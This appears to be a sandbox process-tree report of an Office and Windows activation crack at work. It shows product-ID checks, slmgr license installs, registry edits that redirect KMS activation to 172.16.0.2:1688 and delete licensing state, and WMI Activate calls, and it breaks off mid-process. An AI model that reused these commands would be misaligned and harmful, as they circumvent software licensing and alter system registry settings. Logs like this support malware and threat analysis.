C:\Windows\system32\findstr.exefindstr /I /C:"Outlook2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1340
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPoint2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1044
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Word2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5000
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Access2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5064
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusiness2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:116
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectPro2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3392
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStd2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5060
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioPro2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1648
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStd2024Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4564
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Professional2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4856
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusiness2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5108
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudent2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3280
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlus2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3592
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Standard2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:892
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Excel2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3288
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Outlook2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4404
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPoint2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3108
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Publisher2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:544
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Word2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1516
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Access2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3472
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusiness2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4548
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectPro2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4388
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStd2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2944
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioPro2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2240
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStd2021Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5084
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Professional2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1928
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusiness2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4740
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudent2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1480
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlus2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3920
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Standard2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3988
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Excel2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2024
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Outlook2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1560
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPoint2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3984
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Publisher2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:400
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Word2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2960
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Access2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3732
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusiness2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3024
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectPro2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2736
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStd2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5024
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioPro2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1452
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStd2019Retail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1340
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProfessionalRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3960
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusinessRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4484
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudentRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5064
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365ProPlusRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1080
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365BusinessRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3392
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365SmallBusPremRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:468
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365HomePremRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2220
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365EduCloudRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2860
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"MondoRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4684
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"StandardRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2320
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2636
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3444
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3384
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4920
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"WordRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3896
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"AccessRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2732
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3360
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1516
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2244
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4548
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4388
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteRetail" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2944
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlus2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2240
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Standard2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5084
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Excel2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4260
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Outlook2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4740
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPoint2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:468
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Publisher2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1480
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Word2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2220
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"Access2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4684
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusiness2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2320
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectPro2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2636
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStd2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3444
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioPro2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3384
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStd2019Volume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4920
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"MondoVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3896
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"StandardVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2732
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4612
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2028
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4844
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4548
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"WordVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5076
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"AccessVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3392
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2552
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:468
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:1480
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:2220
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4112
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3592
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\BF982F93-3B3C-4CA1-8A6E-8130BEE5C625\ProPlusRetail.163⤵
- Modifies registry key
PID:2636
-
-
C:\Windows\system32\find.exefind /i "Office16ProPlusVL_KMS_Client" "C:\Windows\Temp\crvVolume.txt"3⤵PID:3444
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\BF982F93-3B3C-4CA1-8A6E-8130BEE5C625\ProPlusVolume.163⤵
- Modifies registry key
PID:3384
-
-
C:\Windows\system32\find.exefind /i "Office16MondoVL_KMS_Client" "C:\Windows\Temp\crvVolume.txt"3⤵PID:1464
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-bridge-office.xrm-ms"3⤵PID:3360
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root-bridge-test.xrm-ms"3⤵PID:1516
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root.xrm-ms"3⤵PID:1044
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-stil.xrm-ms"3⤵PID:4548
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul-oob.xrm-ms"3⤵PID:1928
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul.xrm-ms"3⤵PID:4524
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\pkeyconfig-office.xrm-ms"3⤵PID:468
-
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /f /v ProPlus2019Volume.OSPPReady3⤵
- Modifies registry key
PID:3280
-
-
C:\Program Files\Microsoft Office\root\integration\Integrator.exe"C:\Program Files\Microsoft Office\root\integration\integrator.exe" /I /License PRIDName=ProPlus2019Volume.16 PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:2220
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663'" get LicenseFamily3⤵PID:1928
-
-
C:\Windows\system32\find.exefind /i "ProPlus2019VL_"3⤵PID:4856
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /f /v ProPlus2019Volume.OSPPReady /t REG_SZ /d 13⤵
- Modifies registry key
PID:3280
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:5084
-
-
C:\Windows\system32\findstr.exefindstr /I "ProPlus2019Volume"3⤵PID:3732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- System Location Discovery: System Language Discovery
PID:3108 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds4⤵
- Modifies registry key
PID:3896
-
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds /t REG_SZ /d "ProPlusRetail,ProPlus2019Volume" /f3⤵
- Modifies registry key
PID:5076
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:4388
-
-
C:\Windows\system32\findstr.exefindstr 20193⤵PID:4548
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:3960
-
-
C:\Windows\system32\findstr.exefindstr 20213⤵PID:1560
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:980
-
-
C:\Windows\system32\findstr.exefindstr 20243⤵PID:400
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingService where Version='10.0.19041.1266' call RefreshLicenseStatus3⤵PID:544
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoxmled.exe"3⤵PID:1480
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "Description like '%KMSCLIENT%' AND NOT Name like '%MondoR_KMS_Automation%'" get Name /value3⤵PID:2760
-
-
C:\Windows\system32\find.exefind /i "Office 16" "C:\Windows\Temp\sppchk.txt"3⤵PID:4036
-
-
C:\Windows\system32\find.exefind /i "Office 19" "C:\Windows\Temp\sppchk.txt"3⤵PID:3024
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND NOT Name like '%O365%'" get Name /value3⤵PID:664
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:3108
-
-
C:\Windows\system32\find.exefind /i "Office 14"3⤵PID:4484
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:4260
-
-
C:\Windows\system32\find.exefind /i "Office 15"3⤵PID:4388
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:3960
-
-
C:\Windows\system32\find.exefind /i "Office 16"3⤵PID:4112
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:2024
-
-
C:\Windows\system32\find.exefind /i "Office 19"3⤵PID:980
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:780
-
-
C:\Windows\system32\find.exefind /i "Office 21"3⤵PID:3472
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:3988
-
-
C:\Windows\system32\find.exefind /i "Office 24"3⤵PID:1480
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND LicenseFamily like 'Office16O365%'" get LicenseFamily /value3⤵PID:2860
-
-
C:\Windows\system32\find.exefind /i "O365"3⤵PID:3544
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "Description like '%KMSCLIENT%'" get Name /value3⤵PID:4112
-
-
C:\Windows\system32\findstr.exefindstr /i Windows3⤵PID:4564
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL" get Name /value3⤵PID:4688
-
-
C:\Windows\system32\findstr.exefindstr /i Windows3⤵PID:4844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL" get GracePeriodRemaining /value 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2028 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL" get GracePeriodRemaining /value4⤵PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingService get Version /value3⤵
- System Location Discovery: System Language Discovery
PID:3024 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingService get Version /value4⤵PID:4524
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2"3⤵PID:2960
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /t REG_SZ /d "1688"3⤵PID:1080
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2" /reg:323⤵PID:2736
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /t REG_SZ /d "1688" /reg:323⤵PID:4524
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /reg:323⤵PID:1340
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2" /reg:323⤵PID:2240
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServicePort /t REG_SZ /d "1688" /reg:323⤵PID:4856
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f3⤵PID:3024
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2"3⤵PID:3544
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServicePort /t REG_SZ /d "1688"3⤵PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' " get ID /value3⤵
- System Location Discovery: System Language Discovery
PID:2736 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' " get ID /value4⤵PID:4524
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get LicenseStatus /value3⤵PID:2240
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:1080
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:2024
-
-
C:\Windows\system32\findstr.exefindstr /i "2de67392-b7a7-462a-b1ca-108dd189f588"3⤵PID:4844
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588" /f3⤵PID:1340
-
-
C:\Windows\system32\reg.exereg delete "HKU\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /f3⤵
- Modifies data under HKEY_USERS
PID:3024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get Name /value3⤵
- System Location Discovery: System Language Discovery
PID:4524 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get Name /value4⤵PID:2860
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where ID='2de67392-b7a7-462a-b1ca-108dd189f588' call Activate3⤵PID:1340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get GracePeriodRemaining /value3⤵
- System Location Discovery: System Language Discovery
PID:5352 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get GracePeriodRemaining /value4⤵PID:5368
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='3f1afc82-f8ac-4f6c-8005-1d233e606eee'" get LicenseStatus /value3⤵PID:5400
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:5408
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:5448
-
-
C:\Windows\system32\findstr.exefindstr /i "3f1afc82-f8ac-4f6c-8005-1d233e606eee"3⤵PID:5456
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='73111121-5638-40f6-bc11-f1d7b0d64300'" get LicenseStatus /value3⤵PID:5496
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:5504
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:5692
-
-
C:\Windows\system32\findstr.exefindstr /i "73111121-5638-40f6-bc11-f1d7b0d64300"3⤵PID:5704
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='82bbc092-bc50-4e16-8e18-b74fc486aec3'" get LicenseStatus /value3⤵PID:6052
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:6060
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:5680
-
-
C:\Windows\system32\findstr.exefindstr /i "82bbc092-bc50-4e16-8e18-b74fc486aec3"3⤵PID:5688
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='e0c42288-980c-4788-a014-c080d2e1926e'" get LicenseStatus /value3⤵PID:5900
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:5856
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:5580
-
-
C:\Windows\system32\findstr.exefindstr /i "e0c42288-980c-4788-a014-c080d2e1926e"3⤵PID:5596
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='e4db50ea-bda1-4566-b047-0ca50abc6f07'" get LicenseStatus /value3⤵PID:3000
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:5676
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:436
-
-
C:\Windows\system32\findstr.exefindstr /i "e4db50ea-bda1-4566-b047-0ca50abc6f07"3⤵PID:4120
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='ec868e65-fadf-4759-b23e-93fe37f2cc29'" get LicenseStatus /value3⤵PID:5680
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:5144
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:5928
-
-
C:\Windows\system32\findstr.exefindstr /i "ec868e65-fadf-4759-b23e-93fe37f2cc29"3⤵PID:5852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' and Description like '%KMSCLIENT%'" get ID /value3⤵
- System Location Discovery: System Language Discovery
PID:6136 -
